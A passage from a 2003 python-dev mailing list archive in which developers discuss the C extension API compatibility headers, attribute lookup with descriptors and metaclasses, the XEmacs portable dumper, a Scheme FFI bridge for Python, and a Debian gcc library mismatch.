and uses less of my resources. Since Guido donated 8+1 bits
to me, I have a big degree of freedom about how I will
implement things in the future.

Maybe I'd go ahead and see these bits checked in ASAP, and then
re-think the design. Perhaps I will give back 8 bits, when I really
don't need them, but I really don't know, yet.

thanks anyway -- good idea - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From martin@v.loewis.de  Mon May 19 23:33:25 2003
From: martin@v.loewis.de ("Martin v. Löwis")
Date: Tue, 20 May 2003 00:33:25 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16073.18657.581177.570701@gargle.gargle.HOWL>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>	<1053050696.26479.35.camel@geddy> <16073.18657.581177.570701@gargle.gargle.HOWL>
Message-ID: <3EC95BB5.7000706@v.loewis.de>

Matthias Klose wrote:
 > - make tkinter compatible with tk-8.4.2.
 >   See http://python.org/sf/707701

As the comment indicates, the patch was already applied as
1.160.10.3. Is anything needed beyond that?

> - Send anonymous password when using anonftp
>   Lib/ftplib.py 1.62 1.63
>   See http://python.org/sf/497420
> 
> - robotparser.py fails on some URLs (including change of copyright
>   from "Python 2.0 open source license").
>   See http://python.org/sf/499513

I will look into those two.

Regards,
Martin



From cgw@alum.mit.edu  Mon May 19 23:55:09 2003
From: cgw@alum.mit.edu (Charles G Waldman)
Date: Mon, 19 May 2003 17:55:09 -0500
Subject: [Python-Dev] portable undumper in xemacs
In-Reply-To: <20030519160007.6607.29714.Mailman@mail.python.org>
References: <20030519160007.6607.29714.Mailman@mail.python.org>
Message-ID: <16073.24781.473766.414482@nyx.dyndns.org>

 > develop it, she simply downloaded it.  The other dumpers in xemacs
 > seem to be GPL, and I think that the "portable undump" mentioned by
 > another poster is a placeholder for a project that isn't written yet:
 > http://www.xemacs.org/Architecting-XEmacs/unexec.html)

I'm pretty sure that the "Architecting-XEmacs" page is out of date,
and the "portable undump" is a reality.  Grab current xemacs sources
and try doing "./configure --with-pdump"




From tim@zope.com  Tue May 20 00:26:24 2003
From: tim@zope.com (Tim Peters)
Date: Mon, 19 May 2003 19:26:24 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHJEGAB.tim@zope.com>

[Moore, Paul, on
 http://www.python.org/dev/doc/devel/ext/defining-new-types.html
]

> Just looking at this, I note the "Note" at the top. The way
> this reads, it implies that details of how things used to work
> has been removed. I don't know if this is true, but I'd prefer
> if it wasn't.
>
> People upgrading their extensions would find the older
> information useful

I'm not sure how.  If their extensions work now, there's a very high degree
of compatibility, and they should continue to work.  If they want to make
life simpler by exploiting new API features, then they need the new docs,
and the old docs say nothing useful about that (since they were written
before the newer API gimmicks were even ideas).

> (actually, an "Upgrading from the older API" section would be even
> nicer, but that involves more work...)

Except that the old API still functions.  Even major abusers <wink> like
ExtensionClass still work under 2.3.

There's one sometimes-expressed need that isn't being met:  people who need
their extensions to run under many versions of Python.  The canonical
examples of extensions are in the Python core, and of course those only need
to run with the current Python release, so staring at them doesn't yield any
clues.  I'm not sure we (the developers) give it much thought, either (e.g.,
I know I don't -- the # of things I can worry about at once decreases as I
grow older <0.3 wink>).

Micheal Hudson made a nice start in that direction, with 2.3's

    Misc/pymemcompat.h

If you write your code to 2.3's simpler memory API, and #include that file,
it will translate 2.3's spellings (via macros) into older spellings back
through 1.5.2, keying off PY_VERSION_HEX to choose the right renamings.

Jim is doing something related by hand in these docs, via the unnecessary

    #ifndef PyMODINIT_FUNC	/* declarations for DLL import/export */
    #define PyMODINIT_FUNC void
    #endif

blocks.  That is, PyMODINIT_FUNC is defined (via Python.h) in 2.3, so the
development docs shouldn't encourage pretending it may not be.  It would be
a good idea to add suitable redefinitions of PyMODINIT_FUNC to pymemcompat.h
too, but whether someone will volunteer to do so is an open question.
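
Something along these lines would presumably do (a sketch only, and note
that it punts on the DL_EXPORT decoration older Windows builds want):

    /* pyapicompat-style shim: only define PyMODINIT_FUNC ourselves on
       pre-2.3 Pythons, where Python.h doesn't provide it */
    #if PY_VERSION_HEX < 0x02030000 && !defined(PyMODINIT_FUNC)
    #  ifdef __cplusplus
    #    define PyMODINIT_FUNC extern "C" void
    #  else
    #    define PyMODINIT_FUNC void
    #  endif
    #endif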

> Having to refer to an older copy of the documentation (which they
> may not even have installed) could tip the balance between "lets
> keep up to date" and "if it works, don't fix it".
>
> Heck, I still have some code I wrote for the 1.4 API which still
> works.

It probably still does.

> I've never got round to upgrading it, on the basis that someone might
> be using it with 1.5 still. But when I do, I'd dump pre-2.2 support, so
> *I* have no use for "older" documentation except to find out what all
> that old code meant... :-)

What remains unclear is what good the older documentation would do anyone.
You're going to migrate or you're not.  If you don't, you don't need the new
docs; if you do, you don't need the old docs; it's those who want to support
multiple Pythons simultaneously who need to know everything, and they really
need more help than throwing all releases' docs into one giant pile.



From dberlin@dberlin.org  Tue May 20 04:04:35 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Mon, 19 May 2003 23:04:35 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519120633.GA12073@unpythonic.net>
Message-ID: <C915D808-8A6F-11D7-B20E-000A95A34564@dberlin.org>

On Monday, May 19, 2003, at 08:06  AM, Jeff Epler wrote:

> On Sun, May 18, 2003 at 11:28:08PM -0400, Barry Warsaw wrote:
>> Since it looks like you implemented the meat of it as a module, I
>> wonder if it couldn't be cleaned up (with the interrupt reset either
>> pulled in the extension or exposed to Python) and added to Python 2.3?
>
> First off, I sure doubt that this feature could be truly made
> "non-experimental" before 2.3 is released.  There was one "strange 
> bug" so
> far (the signal thing), though that was quickly solved (with another
> change to the core Python source code).
>
> Secondly, forcing all allocations to come from the heap instead of 
> mmap'd
> space may hurt performance.
>
> Thirdly, the files implementing unexec itself, which come from fsf 
> emacs,
> are covered by the GNU GPL, which I think makes them unsuitable for
> compiling into Python. (There's something called "dynodump" in Emacs 
> that
> appears to apply to ELF binaries which bears this license:
>  * This source code is a product of Sun Microsystems, Inc. and is 
> provided
>  * for unrestricted use provided that this legend is included on all 
> tape
>  * media and as a part of the software program in whole or part.  Users
>  * may copy or modify this source code without charge, but are not 
> authorized
>  * to license or distribute it to anyone else except as part of a 
> product or
>  * program developed by the user.
> I wish I understood what "except as part of a product or program 
> developed
> by the user" meant--does that mean that Alice can't download Python
> then give it to Bob if it includes dynodump?  After all, Alice didn't
> develop it, she simply downloaded it.  The other dumpers in xemacs
> seem to be GPL, and I think that the "portable undump" mentioned by
> another poster is a placeholder for a project that isn't written yet:
> http://www.xemacs.org/Architecting-XEmacs/unexec.html)
It was written and has been on by default since 21.2 came out; the
website is out of date.

See http://www.xemacs.org/Releases/Public-21.2/projects/pdump.html

It's probably too xemacs specific, however.

The file you want is dumper.c.

>
> Fourthly, we'd have to duplicate whatever machinery chooses the correct
> unexec implementation for the platform you're running on---there are 
> lots to
> choose from:

Only if you do undumping the same way.  The portable dumper approach was
not to make an executable, but to put the dump in a separate file, stored
in a neutral format that was architected to make loading fast.
It's still faster than loading byte-compiled files, since nothing needs 
to be executed as we are just recreating the in-memory representation.

> 	unexaix.c     unexconvex.c  unexenix.c     unexnext.c    unexw32.c
> 	unexalpha.c   unexec.c      unexhp9k800.c  unexsni.c
> 	unexapollo.c  unexelf.c     unexmips.c     unexsunos4.c
> (Of course, it's well known that only elf and win32 matter in these 
> modern
> times)
>
> I'd be excited to see "my work" in Python, though the fact of the 
> matter
> is that I just tried this out because I was bored on a Sunday 
> afternoon.
>
> Jeff
>



From dberlin@dberlin.org  Tue May 20 04:06:01 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Mon, 19 May 2003 23:06:01 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519154848.GD13673@unpythonic.net>
Message-ID: <FC677B48-8A6F-11D7-B20E-000A95A34564@dberlin.org>

On Monday, May 19, 2003, at 11:48  AM, Jeff Epler wrote:

> On Mon, May 19, 2003 at 10:39:33AM -0500, Skip Montanaro wrote:
>> I assume none of this stuff will work on Windows.
>
> there *is* a "unexnt.c" in xemacs,
Unused.
Xemacs uses the dumper.c portable dumper by default on NT nowadays.

If you were to choose an unexec, you'd thus want the one from emacs, 
since it's presumably still maintained.

>  and "unexw32.c" in emacs. 



From dsilva@ccs.neu.edu  Tue May 20 05:20:35 2003
From: dsilva@ccs.neu.edu (Daniel Silva)
Date: Tue, 20 May 2003 00:20:35 -0400 (EDT)
Subject: [Python-Dev] Python Run-Time System and Extensions
Message-ID: <Pine.GSO.4.53.0305200018560.24697@denali.ccs.neu.edu>

[Note: I first sent this to Jeremy Hylton through his MIT e-mail address,
but in case he no longer uses that one, I'm resending to python-dev and
his Zope account.]

Hello,

My name is Daniel Silva and I'm working on a Python compiler that
generates PLT Scheme code.  The work is nearly done, except for large
parts of the run-time system and support for python C extensions.

Since PLT's platform is MzScheme, I need to connect the MzScheme
foreign-function interface to the C Python foreign-function interface and
vice-versa.=A0 MzScheme's FFI works with SchemeObject C data structures and
Python's FFI works with PyObject, among others.=A0 We aim for
source compatibility, not binary.=A0 To achieve this, we see two
possibilities: provide our own Python.h and typedef PyObject as another
name for SchemeObject, or marshall SchemeObject structures into PyObject
structures.

If we were to pretend that SchemeObjects are PyObjects, we could have
Scheme do most of the work, but we run into problems with C structure
field access.  Through this method, we can use the existing code of the
Python runtime system that uses selectors -- which I heard you are
responsible for (thank you!) -- and replace the implementation of
selectors like PyString_Get_Size with calls to Scheme equivalents, such as
scheme_string_get_size, which would not break code that uses selectors.

This approach is problematic when we encounter C code that looks like
my_py_obj->some_field.  This obviously would be incompatible, as
SchemeObjects do not have the same fields.  Such a style is used in
various parts of the Python runtime system, and we would have to
re-implement all of those.  That is a bit of a burden, but more worrisome
is the possibility of third-party Python C extensions using this style --
those would not work with our system.
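
For instance (using PyString_Size as the selector-style spelling here;
the exact names are beside the point):

    /* obj: a PyObject * that is claimed to be a string */

    /* selector style: our runtime can supply its own PyString_Size that
       forwards to scheme_string_get_size */
    int n = PyString_Size(obj);

    /* direct field access: assumes obj really is laid out as a
       PyStringObject, so it breaks when obj is actually a SchemeObject */
    int m = ((PyStringObject *)obj)->ob_size;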

The alternative is to marshall every SchemeObject into the PyObject data
structure described in CPython's own headers.  This method would make it
possible for us to use both the Python runtime system (and automatically
keep up with changes) and third-party extensions.  However, once our
objects are marshalled into PyObjects, any change made to the new target
is not seen by the original SchemeObject, so we lose mutation.  Without
mutation, our interpreter is useless for virtually every Python program.

We are ready to pick an option and run with it.  Do you think one of those
two holds better hope than the other, or do you see a third alternative?
I am willing to provide the remaining selectors for the CPython project,
or if they already exist, to write the necessary documentation to advocate
their use to those writing extensions.

Regards,

Daniel Silva


From BPettersen@NAREX.com  Tue May 20 07:25:26 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Tue, 20 May 2003 00:25:26 -0600
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary  for 2003-05-01 through 2003-05-15)
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE51A@admin56.narex.com>

> From: Phillip J. Eby [mailto:pje@telecommunity.com]
>
> At 09:58 PM 5/18/03 -0400, Aahz wrote:
> > [Normally I send my corrections to Brett privately, but
> > since I'm taking a whack at attribute lookup, I figured
> > this ought to be public.]
> >
> >On Sun, May 18, 2003, Brett C. wrote:
> > >
> > > The only thing I would like help with this summary is if
> > > someone knows the attribute lookup order (instance,
> > > class, class descriptor, ...)

[...]

> >This gets real tricky.  For simple attributes of an
> >instance, the order is instance, class/type, and base
> >classes of the class/type (but *not* the metaclass).
> >However, method resolution of the special methods goes
> >straight to the class.  Finally, if an attribute is found on the
> >instance, a search goes through the hierarchy to see whether a set
> >descriptor overrides (note specifically that it's a set descriptor;
> >methods are implemented using get descriptors).
> >
> >I *think* I have this right, but I'm sure someone will
> >correct me if I'm wrong.
>
> Here's the algorithm in a bit more detail:
>
> 1. First, the class/type and its bases are searched, checking
> dictionaries only.
>
> 2. If the object found is a "data descriptor"  (i.e. has a
> type with a non-null tp_descr_set pointer, which is closely
> akin to whether the descriptor has a '__set__' attribute),
> then the data descriptor's __get__ method is invoked.
>
> 3. If the object is not found, or not a data descriptor, the
> instance dictionary is checked.  If the attribute isn't in the
> instance dictionary, then the descriptor's __get__ method is
> invoked (assuming a descriptor was found).
>
> 4. Invoke __getattr__ if present.
>
> (Note that replacing __getattribute__ *replaces* this entire
> algorithm.)
>
> Also note that special methods are *not* handled specially here.
> The behavior Aahz is referring to is that slots (e.g. tp_call) on
> new-style types do not retrieve an instance attribute; they are
> based purely on class-level data.
[...]

Wouldn't that be explicitly specified class-level data, i.e. it
circumvents the __getattr__ hook completely:

>>> class C(object):
...   def __getattr__(self, attr):
...     if attr == '__len__':
...        return lambda:42
...
>>> c = C()
>>> len(c)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() of unsized object

this makes it impossible to implement a __getattr__ anywhere that
intercepts len(obj):

>>> class meta(type):
...   def __getattr__(self, attr):
...     if attr == '__len__':
...        return lambda:42
...
>>> class C(object):
...   __metaclass__ = meta
...
>>> C.__len__()
42
>>> c = C()
>>> len(c)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() of unsized object
>>> len(C)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() of unsized object

The meta example would have to work to be able to create "true" proxy
objects(?)

Is this intended behaviour?

-- bjorn


From Paul.Moore@atosorigin.com  Tue May 20 10:19:09 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Tue, 20 May 2003 10:19:09 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DB17@UKDCX001.uk.int.atosorigin.com>

From: Tim Peters [mailto:tim@zope.com]
> What remains unclear is what good the older documentation
> would do anyone. You're going to migrate or you're not.
> If you don't, you don't need the new docs; if you do, you
> don't need the old docs

My thought was that if & when I ever go back to this code, the
chance of me remembering what the old APIs do is pretty small.
Upgrading therefore includes an element of reading the old docs
to reverse engineer my original intent :-)

But I take the point - this scenario is unlikely enough to be
not worth worrying about.

Thanks for your explanation,
Paul.


From flight@debian.org  Tue May 20 10:59:25 2003
From: flight@debian.org (Gregor Hoffleit)
Date: Tue, 20 May 2003 11:59:25 +0200
Subject: [Python-Dev] [debian build error]
In-Reply-To: <20030519163247.GD26355@localhost>
References: <20030519145755.GB25000@localhost> <16072.62818.314237.459419@montanaro.dyndns.org> <20030519163247.GD26355@localhost>
Message-ID: <20030520095925.GB20760@hal.mediasupervision.de>

* Luke Kenneth Casson Leighton <lkcl@samba-tng.org> [030519 18:39]:
> On Mon, May 19, 2003 at 10:16:50AM -0500, Skip Montanaro wrote:
> > 
> >     Luke> gcc 3.3 is now the latest for unstable.
> > 
> >     Luke> gcc 3.3 contains a package libstdc++-5.
> > 
> >     Luke> python2.2 is compiled with gcc 3.2.
> > 
> >     Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
> >     Luke> causes python2.2 to complain:
> > 
> >     Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.
> > 
> > Is python2.2 compiled by you from source or is it a Debian-provided package?
>  
>  debian-provided.  i've actually had to remove gcc altogether in order
>  to solve the problem (!!!)

Please report such issues to the Debian Bug Tracking System
(http://bugs.debian.org).

I'm not able to reproduce this problem when I "apt-get install -t
unstable python2.2 gcc-3.3 g++-3.3". On my system, python2.2 is linked
with /usr/lib/libstdc++.so.5, which is provided by the package
libstdc++5, which has indeed been built from the gcc-3.3 source. And
python2.2 still works just fine.

The line with /usr/lib/libgcc1_s.so.1 looks dubious. This ought to be
/lib/libgcc_s.so.1, which is provided by the libgcc1 package, which is
also derived from the gcc-3.3 source.

Can you please make sure that this is really the Debian python2.2
binary, and that you're indeed using /usr/lib/libgcc1_s.so.1 ?


Then, please issue a bug report including information such as the
header lines from starting python2.2, the revision numbers of the
affected packages (at least python2.2, g++-3.3, libstdc++5 and libgcc1).


Thanks,

    Gregor


From mwh@python.net  Tue May 20 12:04:05 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 20 May 2003 12:04:05 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEHJEGAB.tim@zope.com> ("Tim Peters"'s
 message of "Mon, 19 May 2003 19:26:24 -0400")
References: <LNBBLJKPBEHFEDALKOLCAEHJEGAB.tim@zope.com>
Message-ID: <2mbrxxanh6.fsf@starship.python.net>

"Tim Peters" <tim@zope.com> writes:

> Micheal Hudson made a nice start in that direction, with 2.3's

Hey, even Tims can't spell my name right!

>     Misc/pymemcompat.h
>
> If you write your code to 2.3's simpler memory API, and #include that file,
> it will translate 2.3's spellings (via macros) into older spellings back
> through 1.5.2, keying off PY_VERSION_HEX to choose the right renamings.
>
> Jim is doing something related by hand in these docs, via the unnecessary
>
>     #ifndef PyMODINIT_FUNC	/* declarations for DLL import/export */
>     #define PyMODINIT_FUNC void
>     #endif
>
> blocks.  That is, PyMODINIT_FUNC is defined (via Python.h) in 2.3, so the
> development docs shouldn't encourage pretending it may not be.  It would be
> a good idea to add suitable redefinitions of PyMODINIT_FUNC to pymemcompat.h
> too, but whether someone will volunteer to do so is an open question.

Well, I could do this in a minute, but

(a) the file then becomes misnamed (perhaps pyapicompat.h ...)

(b) I suspect some fraction of the value of pymemcompat.h is that it
    is short and has just-less-than abusive guidance on which memory
    API functions to use.

Cheers,
M.

-- 
  ARTHUR:  Ford, you're turning into a penguin, stop it.
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 2


From walter@livinglogic.de  Tue May 20 12:51:16 2003
From: walter@livinglogic.de (Walter Dörwald)
Date: Tue, 20 May 2003 13:51:16 +0200
Subject: [Python-Dev] a strange case
In-Reply-To: <200305192033.h4JKXWe19538@pcp02138704pcs.reston01.va.comcast.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org> <200305161345.25415.troy@gci.net> <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net> <3EC806E6.3040204@livinglogic.de> <200305192033.h4JKXWe19538@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECA16B4.5070509@livinglogic.de>

Guido van Rossum wrote:
>>But reload() won't work for these pseudo modules (See
>>http://www.python.org/sf/701743).
> 
> Reload() is a hack that doesn't really work except in the most simple
> cases.  This isn't one of those.

It could be made to work, if the code in a module had a way of
knowing whether this import is the first one or not, and it had
access to what was in sys.modules before the import mechanism
replaces it with an empty module.
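
(For the first half: an ordinary module can already tell, since reload()
re-executes the module's code in the existing module namespace rather than
a fresh one -- a small sketch with made-up names; it's the
sys.modules-replacing trick discussed here that this doesn't help with.)

    # Inside the module being (re)imported:
    try:
        _loaded_before
    except NameError:
        _loaded_before = True     # first import
        first_import = True
    else:
        first_import = False      # this execution is a reload()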

>>What about the imp module?
 >
> Yes, what about it?  (I don't understand the remark.)

Does the imp module work with modules that replace the
module entry in sys.modules? (Code in PyImport_ExecCodeModuleEx()
seems to indicate that it does.)

Bye,
    Walter Dörwald




From lkcl@samba-tng.org  Tue May 20 15:12:20 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Tue, 20 May 2003 14:12:20 +0000
Subject: [Python-Dev] [debian build error]
In-Reply-To: <20030520095925.GB20760@hal.mediasupervision.de>
References: <20030519145755.GB25000@localhost> <16072.62818.314237.459419@montanaro.dyndns.org> <20030519163247.GD26355@localhost> <20030520095925.GB20760@hal.mediasupervision.de>
Message-ID: <20030520141220.GI26355@localhost>

On Tue, May 20, 2003 at 11:59:25AM +0200, Gregor Hoffleit wrote:
> * Luke Kenneth Casson Leighton <lkcl@samba-tng.org> [030519 18:39]:
> > On Mon, May 19, 2003 at 10:16:50AM -0500, Skip Montanaro wrote:
> > > 
> > >     Luke> gcc 3.3 is now the latest for unstable.
> > > 
> > >     Luke> gcc 3.3 contains a package libstdc++-5.
> > > 
> > >     Luke> python2.2 is compiled with gcc 3.2.
> > > 
> > >     Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
> > >     Luke> causes python2.2 to complain:
> > > 
> > >     Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.
> > > 
> > > Is python2.2 compiled by you from source or is it a Debian-provided package?
> >  
> >  debian-provided.  i've actually had to remove gcc altogether in order
> >  to solve the problem (!!!)
> 
> Please report such issues to the Debian Bug Tracking System
> (http://bugs.debian.org).

 done that: i was just endeavouring to catch the attention of the
 relevant people.


> I'm not able to reproduce this problem when I "apt-get install -t
> unstable python2.2 gcc-3.3 g++-3.3". 

 try adding unstable to your /etc/apt/source.list and then doing
 an apt-get upgrade.


> On my system, python2.2 is linked
> with /usr/lib/libstdc++.so.5, which is provided by the package
> libstdc++5, which has indeed been built from the gcc-3.3 source. And
> python2.2 still works just fine.

 yes but python2.2 (python2.2-5 or 6) is built and linked with
 gcc 3.2 not gcc 3.3.

 by upgrading the libstdc++.so.5 to one that was built with gcc-3.3
 you get the problem that occurs on my system.


> The line with /usr/lib/libgcc1_s.so.1 looks dubious. This ought to be
> /lib/libgcc_s.so.1, which is provided by the libgcc1 package, which is
> also derived from the gcc-3.3 source.


> Can you please make sure that this is really the Debian python2.2
> binary, and that you're indeed using /usr/lib/libgcc1_s.so.1 ?
 
 yes it is the debian python2.2 binary.

 and /usr/lib/libgcc1_s.so.1.

 i appear not to have /lib in my /etc/ld.so.conf; i do _not_ know
 why not.

 ... it may be because i have upgraded from debian potato on cds
 repeatedly over a period of at least two years?


> Then, please issue a bug report including information such as the
> header lines from starting python2.2, the revision numbers of the
> affected packages (at least python2.2, g++-3.3, libstdc++5 and libgcc1).
 
  i have to work on this as a production system.

  i spent several frantic hours coming up with a procedure to recover
  my system back to a useable state.

  unfortunately i cannot risk the time it might take up on having
  a broken system.

  

  if all programs built with gcc-3.2 (including python2.2 and
  update-menus and groff and minicom and a whole boat-load of
  others) are replaced with programs built with gcc-3.3 then
  the problem i experienced goes away.

  l.

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From tismer@tismer.com  Tue May 20 15:38:03 2003
From: tismer@tismer.com (Christian Tismer)
Date: Tue, 20 May 2003 16:38:03 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net> <3EC94A92.2040604@tismer.com> <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECA3DCB.50306@tismer.com>

Guido van Rossum wrote:

>>>It's better to reserve bits explicitly.  Can you submit a patch to SF
>>>that makes reservations of the bits you need?  All they need is a
>>>definition of a symbol and a comment explaining what it is for;
>>>"reserved for Stackless" is fine.

Tismer:
>>Ok, what I'm asking for is:
>>"please reserve one bit for me in tp->flags" (31 preferred) and
>>"please reserve 8 bits for me in ml->flags" (24-31 preferred).

There is one second thought about this, but I'm not sure
whether it is allowed to do so:

Assuming that I *would* simply add a field to PyMethodDef,
and take care that all types coming from foreign binaries
don't have that special type bit set, could I not simply create
a new method table and replace it for that external type
by just changing its method table pointer?

I think traversing method tables is always an action that
the core dll does. Or do I have to fear that an extension
does special things to method tables at runtime?

If that approach is trustworthy, I also could drop
the request for these 8 bits.

thanks - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/



From pje@telecommunity.com  Tue May 20 17:19:43 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 20 May 2003 12:19:43 -0400
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary
 for 2003-05-01 through 2003-05-15)
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE51A@admin56.narex.com
 >
Message-ID: <5.1.1.6.0.20030520121436.0311de20@telecommunity.com>

At 12:25 AM 5/20/03 -0600, Bjorn Pettersen wrote:
> > From: Phillip J. Eby [mailto:pje@telecommunity.com]
> >
> > 1. First, the class/type and its bases are searched, checking
> > dictionaries only.
> >
> > 2. If the object found is a "data descriptor"  (i.e. has a
> > type with a non-null tp_descr_set pointer, which is closely
> > akin to whether the descriptor has a '__set__' attribute),
> > then the data descriptor's __get__ method is invoked.
> >
> > 3. If the object is not found, or not a data descriptor, the
> > instance dictionary is checked.  If the attribute isn't in the
> > instance dictionary, then the descriptor's __get__ method is
> > invoked (assuming a descriptor was found).
> >
> > 4. Invoke __getattr__ if present.
> >
> > (Note that replacing __getattribute__ *replaces* this entire
> > algorithm.)
> >
> > Also note that special methods are *not* handled specially here.
> > The behavior Aahz is referring to is that slots (e.g. tp_call) on
> > new-style types do not retrieve an instance attribute; they are
> > based purely on class-level data.
>[...]
>
>Wouldn't that be explicitly specified class-level data, i.e. it
>circumvents the __getattr__ hook completely:

I was focusing on documenting the attribute lookup behavior, not the
"special methods" behavior.  :)  My point was only that "special methods" 
aren't implemented via attribute lookup, so the attribute lookup rules 
don't apply.


>this makes it impossible to implement a __getattr__ anywhere that
>intercepts len(obj):
>
> >>> class meta(type):
>..   def __getattr__(self, attr):
>..     if attr == '__len__':
>..        return lambda:42
>..
> >>> class C(object):
>..   __metaclass__ = meta
>..
> >>> C.__len__()
>42
> >>> c = C()
> >>> len(c)
>Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>TypeError: len() of unsized object
> >>> len(C)
>Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>TypeError: len() of unsized object
>
>The meta example would have to work to be able to create "true" proxy
>objects(?)

You can always do this:

class C(object):
     def __len__(self):
         return self.getLength()

     def __getattr__(self,attr):
         if attr=='getLength':
              return lambda: 42


if you really need to do that.
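
Another sketch of the same distinction, for what it's worth: putting __len__
*directly* on the metaclass (real class-level data, rather than something
synthesized by __getattr__) does make len(C) work, although len() on
instances of C still fails, because type(C()) is C and C defines no __len__:

    class meta(type):
        def __len__(cls):          # explicit class-level data on the metaclass
            return 42

    class C(object):
        __metaclass__ = meta

    print len(C)    # 42: the slot is filled from the metaclass
    # len(C()) still raises "TypeError: len() of unsized object"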


>Is this intended behaviour?

You'd have to ask Guido that.



From tim.one@comcast.net  Tue May 20 19:13:53 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 20 May 2003 14:13:53 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <2mbrxxanh6.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net>

[Tim]
>> Micheal Hudson made a nice start in that direction, with 2.3's

[Michael Hudson]
> Hey, even Tims can't spell my name right!

Are you sure it wasn't your parents who screwed up here <wink>?  I have a
flu, and am lucky to spell anything write these dayz.  My apologies to you
and your parents.

>> It would be a good idea to add suitable redefinitions of
>> PyMODINIT_FUNC to pymemcompat.h too, but whether someone will
>> volunteer to do so is an open question.

> Well, I could do this in a minute, but

Time's up.

> (a) the file then becomes misnamed (perhaps pyapicompat.h ...)

Sounds good to me.

> (b) I suspect some fraction of the value of pymemcompat.h is that it
>     is short and has just-less-than abusive guidance on which memory
>     API functions to use.

A new pyapicompat.h could just #include the current pymemcompat.h and a new
pywhatevercompat.h.  I'm not sure how easy the latter would be.  The new

  PyAPI_FUNC(type)
  PyAPI_DATA(type)
  PyMODINIT_FUNC

have snaky platform-dependent expansions, and were introduced because the
older spellings were approximately incomprehensibly smushed together.  Since
I don't know what to do offhand if I wanted to support multiple Pythons
using the current API here, I have to guess most users won't either (for
example, Jim's sample docs change the last one to plain void, which isn't
always right); so if you do, I believe it would be a real help.



From mwh@python.net  Tue May 20 19:31:43 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 20 May 2003 19:31:43 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net> (Tim
 Peters's message of "Tue, 20 May 2003 14:13:53 -0400")
References: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net>
Message-ID: <2mel2tpj00.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> [Tim]
>>> Micheal Hudson made a nice start in that direction, with 2.3's
>
